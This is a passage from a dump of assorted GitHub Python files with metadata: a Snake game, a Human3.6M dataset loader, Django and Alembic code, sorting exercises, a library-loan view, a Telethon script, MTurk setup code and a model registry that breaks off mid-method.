self.snake[-1]\n next_vector = self.get_next_vector()\n next_snake_head = (\n next_vector[0] + snake_head[0], next_vector[1] + snake_head[1])\n if next_snake_head == self.food_cords:\n if len(self.snake) == 99:\n raise SnakeEndCondition\n self.food_cords = choice(list(self.get_empty_board_cords()))\n else:\n self.snake.pop(0)\n if self.check_wall_collision(next_snake_head):\n raise SnakeCollisionError\n if self.check_self_collision(next_snake_head):\n raise SnakeCollisionError\n self.snake.append(next_snake_head)\n self.last_direction = self.direction\n\n def 
is_next_turn_valid(self):\r\n        opposite_direction = {\r\n 'up': 'down',\r\n 'down': 'up',\r\n 'left': 'right',\r\n 'right': 'left',\r\n }\r\n return self.last_direction != opposite_direction[self.direction]\r\n\r\n def check_wall_collision(self, cords):\r\n if cords[0] < 0 or cords[0] > 9:\r\n return True\r\n if cords[1] < 0 or cords[1] > 9:\r\n return True\r\n return False\r\n\r\n def check_self_collision(self, cords):\r\n return cords in self.snake\r\n\r\n def get_next_vector(self):\r\n key_dict = {\r\n 'up': (-1, 0),\r\n 'down': (1, 0),\r\n 'left': (0, -1),\r\n 'right': (0, 1),\r\n }\r\n return key_dict[self.direction]\r\n\r\n def print_board(self):\r\n self.empty_grid()\r\n self.put_snake_in_rows()\r\n self.draw_food()\r\n for row in self.rows:\r\n print(*row)\r\n\r\n\r\ndef on_press_for_snake(snake):\r\n def on_press(key):\r\n if key == Key.esc:\r\n return False\r\n pressed_direction = KEY_TO_DIRECTION.get(key)\r\n if pressed_direction is not None:\r\n snake.set_direction(pressed_direction)\r\n return on_press\r\n\r\n\r\nif __name__ == \"__main__\":\r\n snake = Snake()\r\n with Listener(on_press=on_press_for_snake(snake)) as listener:\r\n try:\r\n while True:\r\n snake.print_board()\r\n sleep(0.5)\r\n system('cls')\r\n snake.move_snake()\r\n except SnakeEndCondition:\r\n print('You win!')\r\n except IndexError:\r\n print('You lose!')\r\n except SnakeCollisionError:\r\n print('You collided with something! You lose.')\r\n","repo_name":"Gu234/snake-exercise","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72826271522","text":"import os\n\nimport numpy as np\nimport cdflib\n\nfrom .datasetloader import DatasetLoader\n\n\nclass Human36M(DatasetLoader):\n \"\"\"\n Human 3.6M Dataset\n http://vision.imar.ro/human3.6m/description.php\n \"\"\"\n landmarks = [\n \"not used\", # 0 pelvis - near identical with 11 - NOT USED\n \"left hip\", # 1\n \"left knee\", # 2\n \"left ankle\", # 3\n \"left foot\", # 4\n \"left small toe\", # 5\n \"right hip\", # 6\n \"right knee\", # 7\n \"right ankle\", # 8\n \"right foot\", # 9\n \"right small toe\", # 10\n \"pelvis\", # 11\n \"mid torso\", # 12\n \"neck\", # 13\n \"nose\", # 14\n \"head top\", # 15\n \"not used\", # 16 neck - identical with 13 & 24 - NOT USED\n \"left shoulder\", # 17\n \"left elbow\", # 18\n \"left wrist\", # 19\n \"not used\", # 20 left wrist - identical with 19 - NOT USED\n \"left thumb\", # 21\n \"left handtip\", # 22\n \"not used\", # 23 left hand tip - identical with 22 - NOT USED\n \"not used\", # 24 - neck - identical with 13 & 16 - NOT USED\n \"right shoulder\", # 25\n \"right elbow\", # 26\n \"right wrist\", # 27\n \"not used\", # 28 right wrist - identical with 27 - NOT USED\n \"right thumb\", # 29\n \"right handtip\", # 30\n \"not used\", # 31 right hand tip - identical with 30 - NOT USED\n ]\n\n actions = [\n \"directions\", \"discussion\", \"eating\", \"greeting\", \"phoning\", \"posing\",\n \"purchases\", \"sitting\", \"sittingdown\", \"smoking\", \"photo\", \"waiting\",\n \"walking\", \"walkdog\", \"walktogether\"\n ]\n\n splits = [\"default\"]\n\n def __init__(self, data_path, **kwargs):\n \"\"\"\n Parameters\n ----------\n data_path : string\n folder with dataset on disk\n \"\"\"\n\n self._data_cols = [\n \"video-filenames\",\n \"keypoint2D-filenames\",\n \"keypoint3D-filename\",\n \"keypoint3D-mono-filenames\",\n \"keypoint3D-mono-universal-filenames\",\n \"keypoints2D\",\n \"keypoints3D\",\n \"keypoints3D-mono\",\n \"keypoints3D-mono-universal\",\n \"action\",\n # The dataset also contains 
other data, to be implemented if/when needed\n ]\n self._data = {\n \"video-filenames\": [],\n \"keypoint2D-filenames\": [],\n \"keypoint3D-filename\": [],\n \"keypoint3D-mono-filenames\": [],\n \"keypoint3D-mono-universal-filenames\": [],\n \"action\": [],\n # The dataset also contains other data, to be implemented if/when needed\n }\n self._splits = {\n split: {\n \"train\": [],\n \"test\": []\n }\n for split in Human36M.splits\n }\n\n self._length = 0\n for subject_id in range(1, 11):\n if os.path.exists(os.path.join(data_path, \"S\" + str(subject_id))):\n keypoint_folder = os.path.join(data_path,\n \"S\" + str(subject_id),\n \"MyPoseFeatures\")\n for filename in os.listdir(\n os.path.join(keypoint_folder, 'D3_Positions')):\n if filename.startswith(\".\"):\n continue\n # chop off file ending, leave dot on\n # find will give location of \" \" if it exists (\"Action X.cdf\")\n # otherwise (\"Action.cdf\") find will return -1 and we chop off the dot we left\n # on previously\n action = filename[:-3]\n action = action[:action.find(\" \")].lower()\n if subject_id == 11 and action == 'directions':\n continue # Discard corrupted video\n self._data[\"keypoint3D-filename\"].append(\n os.path.join(keypoint_folder, \"D3_positions\",\n filename))\n # some actions are named inconsistently, fix names\n if action == \"takingphoto\":\n action = \"photo\"\n elif action == \"walkingdog\":\n action = \"walkdog\"\n self._data[\"action\"].append(Human36M.actions.index(action))\n base_filename = filename[:-4]\n\n video_filenames = []\n keypoint2D_filenames = []\n keypoint3D_mono_filenames = []\n keypoint3D_mono_universal_filenames = []\n for d2_filename in os.listdir(\n os.path.join(keypoint_folder, 'D2_Positions')):\n # skip hidden files and files of other actions\n if (d2_filename.startswith(\".\")\n or not d2_filename.startswith(base_filename)):\n continue\n # filenames can be of the form \"Action.cam_name.cdf\" or \"Action X.cam_name.cdf\"\n # need to avoid false matches of Action.cam_name for action X.cam_name\n if d2_filename[len(base_filename):len(base_filename) +\n 1] != \".\":\n continue\n # filenames here are of the structure \"base_filename.cam_name.cdf\"\n # the same is true for other corresponding files so add all of them\n # to the respective lists\n cam_name = d2_filename[len(base_filename) + 1:-4]\n keypoint2D_filenames.append(\n os.path.join(keypoint_folder, \"D2_Positions\",\n d2_filename))\n keypoint3D_mono_filenames.append(\n os.path.join(\n keypoint_folder, \"D3_Positions_mono\",\n base_filename + \".\" + cam_name + \".cdf\"))\n keypoint3D_mono_universal_filenames.append(\n os.path.join(\n keypoint_folder, \"D3_Positions_mono_universal\",\n base_filename + \".\" + cam_name + \".cdf\"))\n video_filenames.append(\n os.path.join(\n data_path, \"S\" + str(subject_id), \"Videos\",\n base_filename + \".\" + cam_name + \".mp4\"))\n\n self._data[\"video-filenames\"].append(video_filenames)\n self._data[\"keypoint2D-filenames\"].append(\n keypoint2D_filenames)\n self._data[\"keypoint3D-mono-filenames\"].append(\n keypoint3D_mono_filenames)\n self._data[\"keypoint3D-mono-universal-filenames\"].append(\n keypoint3D_mono_universal_filenames)\n self._length += 1\n super().__init__(**kwargs)\n\n def load_keypointfile(self, filename):\n \"\"\"\n Load the keypoints sequence from the given file.\n\n Parameters\n ----------\n filename : string\n Filename of the file containing a skeleton sequence\n \"\"\"\n # print(filename)\n cdf_file = cdflib.CDF(filename)\n keypoints = cdf_file.varget(\"Pose\", expand=False)[0]\n 
if keypoints.shape[-1] == 64: # 2D\n keypoints = keypoints.reshape(-1, 32, 2)\n elif keypoints.shape[-1] == 96: # 3D\n keypoints = keypoints.reshape(-1, 32, 3)\n if filename.find(\"mono\") > 0:\n keypoints[:, :, 1] *= -1\n else:\n keypoints = keypoints[:, :, (0, 2, 1)]\n return np.array(keypoints)\n\n def __getitem__(self, index):\n \"\"\"\n Indexing access to the dataset.\n\n Returns a dictionary of all currently selected data columns of the\n selected item.\n \"\"\"\n data = super().__getitem__(index)\n # super() provides all non-lazy access, only need to do more for data\n # that hasn't been loaded previously\n missing_cols = self._selected_cols - data.keys()\n if len(missing_cols) > 0:\n for col in missing_cols:\n if col.startswith(\"keypoints\"):\n if col == \"keypoints3D\":\n data[\"keypoints3D\"] = self.load_keypointfile(\n self._data[\"keypoint3D-filename\"][index])\n else:\n filename_index = \"keypoint\" + col[9:] + \"-filenames\"\n data[col] = []\n for filename in self._data[filename_index][index]:\n data[col].append(self.load_keypointfile(filename))\n return data\n","repo_name":"kschlegel/DatasetLoader","sub_path":"datasetloader/human36m.py","file_name":"human36m.py","file_ext":"py","file_size_in_byte":8919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"5201761934","text":"__author__ = 'Bertrand'\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom league_manager.models.ref_roster import Ref_Roster\nfrom league_manager.models.ref_skills import Ref_Skills\nfrom league_manager.models.ref_roster_line import Ref_Roster_Line\n\nclass Command(BaseCommand):\n help = 'Show lrb6 roster details'\n\n def handle(self, *args, **options):\n roster_list = Ref_Roster.objects.all()\n\n for roster in roster_list:\n print (\"=====================================================================\")\n print (roster.name)\n print (\"Reroll :\"+str(roster.reroll_price)+ \" pO\")\n print ('---------------------------------------------------------------------')\n roster_lines = Ref_Roster_Line.objects.filter(roster=roster)\n for line in roster_lines:\n skills = line.base_skills;\n print()\n print(str(line.max) +\" \"+line.position+ \" \"+str(line.cost)+\" \"+str(line.M)+\" \"+str(line.F)+\" \"+str(line.Ag)+\" \"+str(line.Ar)+\" \".join([skill.name for skill in skills.all()])+\" \"+line.normal_skills+\" \"+line.double_skills)\n\n\n self.stdout.write(self.style.SUCCESS('Et voilà !\"'))","repo_name":"BBegouin/BBClub","sub_path":"league_manager/management/commands/create_team.py","file_name":"create_team.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71577862561","text":"from django.contrib import messages\r\nfrom django.shortcuts import get_object_or_404, redirect\r\nfrom apps.vendas.models import Venda, Produto_Venda\r\n\r\n\r\ndef deleta_venda(request, venda_id):\r\n\r\n '''Authenticating access to the page'''\r\n\r\n if not request.user.is_authenticated:\r\n return redirect('login')\r\n\r\n ''' Fetching the sale from the database by its primary key '''\r\n\r\n venda = get_object_or_404(Venda, pk=venda_id)\r\n\r\n ''' Fetching the list of products from the auxiliary table '''\r\n lista_produtos = Produto_Venda.objects.order_by('venda_id')\r\n\r\n ''' Filtering the products, keeping only those matching the sale id '''\r\n lista_produtos = lista_produtos.filter(venda_id=venda_id)\r\n\r\n ''' Deleting the sale's items from the database '''\r\n 
lista_produtos.delete()\r\n\r\n ''' Deleting the sale from the database '''\r\n venda.delete()\r\n messages.success(request, 'Deletado com sucesso')\r\n return redirect('vendas')","repo_name":"JPAkira/Ez4Admin","sub_path":"apps/vendas/views/deletar_venda.py","file_name":"deletar_venda.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6664433356","text":"# helper function that swaps the positions of two elements\r\ndef swap_elements(my_list, index1, index2):\r\n # paste the code from the previous exercise here\r\n my_list[index1], my_list[index2] = my_list[index2], my_list[index1]\r\n \r\n return my_list\r\n\r\n# partition function used by quicksort\r\ndef partition(my_list, start, end):\r\n # paste the code from the previous exercise here\r\n b = 0\r\n p = end\r\n for i in range(end): # we only need to look at the range before the pivot, hence range(end)\r\n if my_list[i] <= my_list[p]:\r\n swap_elements(my_list, i, b)\r\n b += 1\r\n \r\n swap_elements(my_list, p, b)\r\n p = b\r\n \r\n return p\r\n\r\n# quicksort (modify it so it can also be called without the start and end parameters!)\r\ndef quicksort(my_list, start=0, end=None):\r\n # paste the code from the previous exercise here\r\n if end == None:\r\n end = len(my_list) - 1\r\n \r\n # base case\r\n # the quicksort function is called recursively; only the start and end parameters change, my_list itself stays the same\r\n if end - start < 1: # end - start == 0 (x)\r\n return # same effect as return None\r\n \r\n p = partition(my_list, start, end)\r\n \r\n # sort the part to the left of the pivot\r\n quicksort(my_list, start, p-1)\r\n \r\n \r\n # sort the part to the right of the pivot\r\n quicksort(my_list, p+1, end)\r\n\r\n# test code 1\r\nlist1 = [1, 3, 5, 7, 9, 11, 13, 11]\r\nquicksort(list1) # called without the start and end parameters\r\nprint(list1)\r\n\r\n# test code 2\r\nlist2 = [28, 13, 9, 30, 1, 48, 5, 7, 15]\r\nquicksort(list2) # called without the start and end parameters\r\nprint(list2)\r\n\r\n# test code 3\r\nlist3 = [2, 5, 6, 7, 1, 2, 4, 7, 10, 11, 4, 15, 13, 1, 6, 4]\r\nquicksort(list3) # called without the start and end parameters\r\nprint(list3)\r\n","repo_name":"kipple99/Algorithm","sub_path":"Codeit/Algorithm Paradigm/detail_quicksort.py","file_name":"detail_quicksort.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39002244083","text":"\"\"\"empty message\n\nRevision ID: ea6764b46df4\nRevises: 61e049b8e58f\nCreate Date: 2016-05-03 16:36:16.322752\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'ea6764b46df4'\ndown_revision = '61e049b8e58f'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('CustomerGroup',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('parent_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['id'], ['Group.id'], ),\n sa.ForeignKeyConstraint(['parent_id'], ['Group.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('UserGroup',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['id'], ['Group.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('CustomerDataGroupMapping',\n sa.Column('customer_id', sa.Integer(), nullable=True),\n sa.Column('data_group_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['customer_id'], ['CustomerGroup.id'], ),\n sa.ForeignKeyConstraint(['data_group_id'], ['DataGroup.id'], )\n )\n op.create_table('CustomerProjectMapping',\n sa.Column('customer_id', sa.Integer(), nullable=True),\n sa.Column('project_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['customer_id'], ['CustomerGroup.id'], ),\n sa.ForeignKeyConstraint(['project_id'], ['Project.id'], )\n )\n op.create_table('CustomerSampleMapping',\n sa.Column('customer_id', sa.Integer(), nullable=True),\n sa.Column('sample_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['customer_id'], ['CustomerGroup.id'], ),\n sa.ForeignKeyConstraint(['sample_id'], ['Sample.id'], )\n )\n op.create_table('CustomerDataItemMapping',\n sa.Column('customer_id', sa.Integer(), nullable=True),\n sa.Column('data_item_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['customer_id'], ['CustomerGroup.id'], ),\n sa.ForeignKeyConstraint(['data_item_id'], ['DataItem.id'], )\n )\n op.drop_table('SampleToCustomer')\n op.drop_table('DataGroupToCustomer')\n op.drop_table('ProjectToCustomer')\n op.add_column('Group', sa.Column('type', sa.String(length=50), nullable=False))\n op.drop_constraint('Group_ibfk_1', 'Group', type_='foreignkey')\n op.drop_column('Group', 'parent_id')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('Group', sa.Column('parent_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True))\n op.create_foreign_key('Group_ibfk_1', 'Group', 'Group', ['parent_id'], ['id'])\n op.drop_column('Group', 'type')\n op.create_table('ProjectToCustomer',\n sa.Column('project_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('customer_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.ForeignKeyConstraint(['customer_id'], ['Customer.id'], name='ProjectToCustomer_ibfk_1'),\n sa.ForeignKeyConstraint(['project_id'], ['Project.id'], name='ProjectToCustomer_ibfk_2'),\n mysql_default_charset='latin1',\n mysql_engine='InnoDB'\n )\n op.create_table('DataGroupToCustomer',\n sa.Column('data_group_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('customer_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.ForeignKeyConstraint(['customer_id'], ['Customer.id'], name='DataGroupToCustomer_ibfk_1'),\n sa.ForeignKeyConstraint(['data_group_id'], ['DataGroup.id'], name='DataGroupToCustomer_ibfk_2'),\n mysql_default_charset='latin1',\n mysql_engine='InnoDB'\n )\n op.create_table('SampleToCustomer',\n sa.Column('sample_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('customer_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.ForeignKeyConstraint(['customer_id'], ['Customer.id'], name='SampleToCustomer_ibfk_1'),\n sa.ForeignKeyConstraint(['sample_id'], ['Sample.id'], name='SampleToCustomer_ibfk_2'),\n mysql_default_charset='latin1',\n mysql_engine='InnoDB'\n )\n op.drop_table('CustomerDataItemMapping')\n op.drop_table('CustomerSampleMapping')\n op.drop_table('CustomerProjectMapping')\n op.drop_table('CustomerDataGroupMapping')\n op.drop_table('UserGroup')\n op.drop_table('CustomerGroup')\n ### end Alembic commands ###\n","repo_name":"JonathanCSmith/biocompute-dm","sub_path":"migrations/versions/ea6764b46df4_.py","file_name":"ea6764b46df4_.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23327506606","text":"import os\nfrom Repository import BooksRepository, LoanedBooksRepository, SubscribersRepository\nfrom Objects.BookObject import Book\nfrom Objects.LoanBooksObject import LoanedBook\nfrom Objects.SubscriberObject import Subscriber\n\nclass LoanAdministration:\n def __init__(self):\n self.AllLoanedBooksList = []\n self.AllSubscribersList = []\n allLoanedBooks = LoanedBooksRepository.readJson()\n allSubscribers = SubscribersRepository.readJson()\n for singleLoanedBook in allLoanedBooks:\n loanObject = LoanedBook(singleLoanedBook)\n self.AllLoanedBooksList.append(loanObject)\n for subscriber in allSubscribers:\n subscriberObject = Subscriber(subscriber)\n self.AllSubscribersList.append(subscriberObject)\n\n def ViewLoanAdministration(self, searchTerm = \"\"):\n if searchTerm != \"\":\n AllBooksView = list(filter(lambda x: searchTerm.lower() in (str(x.Id)+Book(x.Id_book).Title+Subscriber(x.Id_subscriber).Name+str(x.Returned)+x.DateRented+x.DateReturned).lower(), self.AllLoanedBooksList))\n else: \n AllBooksView = self.AllLoanedBooksList\n\n bookRowView = \"\"\n whiteSpaceToAddTitle, whiteSpaceToAddSubscriberName, whiteSpaceToAddDateRented, whiteSpaceToAddDateReturned = 0, 0, 0, 0\n\n for book in AllBooksView:\n bookObject = Book(book.Id_book)\n subscriberObject = 
Subscriber(book.Id_subscriber)\n if len(bookObject.Title) > whiteSpaceToAddTitle:\n whiteSpaceToAddTitle = len(bookObject.Title)\n if len(subscriberObject.Name) > whiteSpaceToAddSubscriberName:\n whiteSpaceToAddSubscriberName = len(subscriberObject.Name)\n if len(book.DateRented) > whiteSpaceToAddDateRented:\n whiteSpaceToAddDateRented = len(book.DateRented)\n if len(book.DateReturned) > whiteSpaceToAddDateReturned:\n whiteSpaceToAddDateReturned = len(book.DateReturned)\n\n for book in AllBooksView:\n bookObject = Book(book.Id_book)\n subscriberObject = Subscriber(book.Id_subscriber)\n if int(book.Id) > 9:\n whiteSpaceAfterId = \" \"*6\n else:\n whiteSpaceAfterId = \" \"*7\n \n whiteSpaceAfterTitle = (\" \" * (whiteSpaceToAddTitle-len(bookObject.Title)))\n whiteSpaceAfterSubscriberName = (\" \" * (whiteSpaceToAddSubscriberName-len(subscriberObject.Name)))\n whiteSpaceAfterDateRented = (\" \" * (whiteSpaceToAddDateRented-len(book.DateRented)))\n whiteSpaceAfterDateReturned = (\" \" * (whiteSpaceToAddDateReturned-len(book.DateReturned)))\n\n bookRowView += \"|| {}{}|| {}{}|| {}{}|| {}{}|| {}{}||\\n\".format(book.Id, whiteSpaceAfterId, \n bookObject.Title, whiteSpaceAfterTitle, \n subscriberObject.Name, whiteSpaceAfterSubscriberName, \n book.DateRented, whiteSpaceAfterDateRented,\n book.DateReturned, whiteSpaceAfterDateReturned)\n \n columnTitleFormatting = \"|| LoanId: || Book Title:{}|| Rented By:{}|| Date Rented:{}|| Date Returned:{}||\".format(\" \"*(whiteSpaceToAddTitle-11),\n \" \"*(whiteSpaceToAddSubscriberName-10),\n \" \"*(whiteSpaceToAddDateRented-12),\n \" \"*(whiteSpaceToAddDateReturned-14))\n\n print(\"=\"*len(columnTitleFormatting))\n print(columnTitleFormatting)\n print(bookRowView[:-1])\n print(\"=\"*len(columnTitleFormatting))\n\n def SearchBook(self):\n searchTerm = input(\"Voer een zoekterm in (op id, auteur, titel of genre): \")\n LoanAdministration.ViewLoanAdministration(self, searchTerm)\n\n def AddSubscriber(self, name, adress):\n newSubscriber = Subscriber.AddSubscriber(name, adress)\n self.AllSubscribersList.append(newSubscriber)\n\n def LoanBook(self, id_book, id_subscriber):\n newLoanedBook = LoanedBook.AddLoanedBook(id_book, id_subscriber)\n self.AllLoanedBooksList.append(newLoanedBook)\n\n def ReturnBook(self, id_loan):\n returnedLoanItem = LoanedBook(id_loan).ReturnLoanedBook()\n self.AllLoanedBooksList.append(returnedLoanItem)","repo_name":"LeroyJenkinss/analyse-PLS","sub_path":"Views/LoanAdministration.py","file_name":"LoanAdministration.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43798842387","text":"# from telethon import TelegramClient\nfrom telethon.sync import TelegramClient\n\napi_id = 12465126\napi_hash = '6f41fc346203d98715395048cff3e1eb'\n\nclient = TelegramClient('session_name', api_id, api_hash)\nclient.start()\n\nentity = client.get_entity('https://t.me/tass_agency')\nprint(entity.stringify()) #All paratmeters\nprint(entity.id)\nmsg = client.get_messages(entity.id, limit=10)\nprint(msg[7].stringify())\n\n","repo_name":"MADE-realtime/realtime_news","sub_path":"parser/parser/data_collection/tg_spider.py","file_name":"tg_spider.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14760316536","text":"# Parameter a is a list\ndef bubble_sort(a):\n for i in range(len(a) - 1):\n for j in range(len(a) - 1 - i):\n if a[j] > a[j+1]:\n a[j], a[j+1] 
= a[j+1], a[j]\n    return a\n\n\ndef bubble_sort_better(a):\n    unsorted = True\n    decreasing_length = len(a) - 1\n    while unsorted:\n        unsorted = False\n        for i in range(decreasing_length):\n            if a[i] > a[i+1]:\n                a[i], a[i+1] = a[i+1], a[i]\n                unsorted = True\n        decreasing_length -= 1\n    return a\n\n\nlist = ['f', 'g', 'b', 'd', 'i', 'c', 'e', 'j', 'h', 'a']\nprint(bubble_sort(list))\nlist = ['f', 'g', 'b', 'd', 'i', 'c', 'e', 'j', 'h', 'a']\nprint(bubble_sort_better(list))\nlist = [9, 6, 2, 4, 8, 3, 5, 10, 7, 1]\nprint(bubble_sort(list))\nlist = [9, 6, 2, 4, 8, 3, 5, 10, 7, 1]\nprint(bubble_sort_better(list))\n","repo_name":"Potokar1/Python_Review","sub_path":"sorting_algorithms/bubble_sort.py","file_name":"bubble_sort.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"36216945450","text":"from pathlib import Path\n\nfrom constants import MTURK_DIR\nfrom easyturk import EasyTurk\nfrom mturk.mturk_util import ALL_HIDS\nfrom util import TIME\nimport json\n\nSANDBOX = False\nTEST_PERCENTAGE_MIN = 90\nPAST_ACCEPTANCE_PERCENTAGE_MIN = 95\nNB_HITS_MIN = 50\nDATA_PER_HIT = 9\nTITLE = f'Say whether one object in a scene \"causes\" another{TIME if SANDBOX else \"\"}'\nDESCRIPTION = f'Say whether you think intervening on the presence of an object in a scene would have' \\\n              f' consequences on the probability of the presence of another object.' \\\n              f' Takes a few minutes to check the explanation video and pass the qualification test,' \\\n              f' and then each hit asks you to label {DATA_PER_HIT} pairs, ' \\\n              f'where each pair probably takes about 10 seconds.'\nKEYWORDS = 'causation, image, objects'\nTIME_PER_HIT = 60*60  # One hour time\nAUTO_APPROVAL_DELAY = 60*60*24*7  # One week time before auto-approving\nREWARD = str(0.4)\n\n\ndef update_hit_types(cl, hitTypeId):\n    for hid in ALL_HIDS:\n        cl.update_hit_type_of_hit(\n            HITId=hid,\n            HITTypeId=hitTypeId\n        )\n\n\ndef main():\n    et = EasyTurk(sandbox=SANDBOX)\n    cl = et.mtc\n    response = create_hit_type(cl)\n    hitTypeId = response['HITTypeId']\n    update_hit_types(cl, hitTypeId)\n\n\ndef create_hit_type(cl):\n    with open(Path(MTURK_DIR, f\"test_qualification_response{'_sandbox' if SANDBOX else ''}.json\"), \"r\") as f:\n        response = json.loads(''.join(f.readlines()))\n    test_qual_id = response['QualificationType']['QualificationTypeId']\n    hit_type_args = {\n        'Title': TITLE,\n        'Description': DESCRIPTION,\n        'Keywords': KEYWORDS,\n        'AssignmentDurationInSeconds': TIME_PER_HIT,\n        'AutoApprovalDelayInSeconds': AUTO_APPROVAL_DELAY,\n        'QualificationRequirements': [\n            {\n                'QualificationTypeId': '00000000000000000040',\n                'Comparator': 'GreaterThanOrEqualTo',\n                'IntegerValues': [NB_HITS_MIN]\n            },\n            # {\n            #     'QualificationTypeId': '00000000000000000071',\n            #     'Comparator': 'EqualTo' if len(countries) == 1 else 'In',\n            #     'LocaleValues': [\n            #         {'Country': country} for country in countries\n            #     ],\n            # },\n            {\n                'QualificationTypeId': '000000000000000000L0',\n                'Comparator': 'GreaterThanOrEqualTo',\n                'IntegerValues': [PAST_ACCEPTANCE_PERCENTAGE_MIN],\n            },\n            {\n                'QualificationTypeId': test_qual_id,\n                'Comparator': 'GreaterThanOrEqualTo',\n                'IntegerValues': [TEST_PERCENTAGE_MIN]\n            }\n        ],\n        'Reward': REWARD\n    }\n    response = cl.create_hit_type(**hit_type_args)\n    return response\n\n\nif __name__ == '__main__':\n    
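# Added commentary (not in the original script): the numeric\n    # QualificationTypeIds above appear to be MTurk's built-in system\n    # qualifications -- '00000000000000000040' is commonly documented as the\n    # worker's number of approved HITs and '000000000000000000L0' as the\n    # assignment approval rate -- so NB_HITS_MIN and\n    # PAST_ACCEPTANCE_PERCENTAGE_MIN gate which workers can take these HITs.\n    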
main()\n","repo_name":"Natithan/p1_causality","sub_path":"mturk/update_hit_types.py","file_name":"update_hit_types.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"30292357770","text":"import logging\n\nfrom pkg_resources import iter_entry_points\n\nlogger = logging.getLogger(__name__)\n\n_REGISTRY = None\n\n\nclass Node:\n \"\"\"Models node in a tree in a forest.\"\"\"\n def __init__(self, model):\n \"\"\"Init the node\n\n :param model: Entity to represent\n :type model: class\n \"\"\"\n self.model = model\n self.parent = None\n self.parent_rel = None\n self.children = {}\n\n @property\n def label(self):\n \"\"\"Get label of model\n\n :return: Model label\n :rtype: str\n \"\"\"\n return self.model.label\n\n\nclass Forest:\n \"\"\"Collection of model trees.\n\n The root of a tree is a model with no parents.\n Each node in each tree contains references to children\n and to a parent.\n \"\"\"\n def __init__(self, models):\n \"\"\"Init the forest\n\n :param models: Dictionary of models keyed by label\n :type models: dict\n \"\"\"\n self.nodes = {}\n self.roots = []\n\n # Create nodes for models\n for model in models.values():\n self.nodes[model.label] = Node(model)\n\n # Create node mappings\n self.grow()\n\n # Find beginnings of trees\n self.find_roots()\n\n def grow(self):\n \"\"\"Establish relationships.\"\"\"\n for node in self.nodes.values():\n for relname, childmodel in node.model.children.values():\n self.nodes[childmodel.label].parent = node\n self.nodes[childmodel.label].parent_rel = relname\n node.children[relname] = self.nodes[childmodel.label]\n\n def find_roots(self):\n \"\"\"Find roots of trees.\n\n Roots are nodes with no parents.\n \"\"\"\n self.roots = []\n for node in self.nodes.values():\n if node.parent is None:\n self.roots.append(node)\n\n def path(self, label):\n \"\"\"Find path of a model with label.\n\n :param label: Label of model\n :type label: str\n :returns: List of (parent model label, relationship name) tuples\n :rtype: list|None\n \"\"\"\n target_node = self.nodes.get(label)\n if target_node is None:\n return None\n\n path = []\n current = target_node\n while current.parent is not None:\n path.append((current.parent, current.parent_rel))\n current = current.parent\n return [(n.label, r) for n, r in reversed(path)]\n\n def paths_from(self, label):\n \"\"\"Find all paths from a model with label.\n\n :param label: Label of model\n :type label: str\n :returns: List of paths from label\n :rtype: list\n \"\"\"\n visited = set()\n paths = []\n\n current_node = self.nodes.get(label)\n stack = [current_node]\n while (stack):\n current = stack[-1]\n visited.add(current)\n for rel_name, child_node in current.children.items():\n if child_node not in visited:\n stack.append(child_node)\n break\n else:\n if not current.children:\n paths.append([n.label for n in stack])\n stack.pop()\n return paths\n\n\nclass Registry:\n \"\"\"Model information about models.\"\"\"\n def __init__(self):\n \"\"\"Init the registry.\"\"\"\n self.models = {}\n self.load_models()\n self.forest = Forest(self.models)\n\n def load_models(self):\n \"\"\"Load installed models from entry points.\"\"\"\n for ep in iter_entry_points(group='cloud_snitch_models'):\n try:\n self.models[ep.name] = ep.load()\n except Exception:\n logger.warn(\n 'Unable to load cloud snitch model {}'.format(ep.name)\n )\n\n def identity_property(self, model):\n \"\"\"Return the identity property of a targeted 